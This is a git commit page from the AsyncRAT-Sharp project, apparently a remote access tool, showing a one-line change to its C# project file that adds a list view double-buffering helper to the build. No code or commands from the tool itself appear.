Update AsyncRAT-Sharp.csproj

This commit is contained in:
NYAN CAT 2019-06-01 12:04:45 +03:00
parent 236b79a0e6
commit cc358fe281

View File

@ -189,6 +189,7 @@
<Compile Include="Helper\AsyncTask.cs" /> <Compile Include="Helper\AsyncTask.cs" />
<Compile Include="Helper\IconInjector.cs" /> <Compile Include="Helper\IconInjector.cs" />
<Compile Include="Helper\ListViewColumnSorter.cs" /> <Compile Include="Helper\ListViewColumnSorter.cs" />
<Compile Include="Helper\ListviewDoubleBuffer.cs" />
<Compile Include="Helper\Methods.cs" /> <Compile Include="Helper\Methods.cs" />
<Compile Include="Helper\ReferenceLoader.cs" /> <Compile Include="Helper\ReferenceLoader.cs" />
<Compile Include="MessagePack\BytesTools.cs" /> <Compile Include="MessagePack\BytesTools.cs" />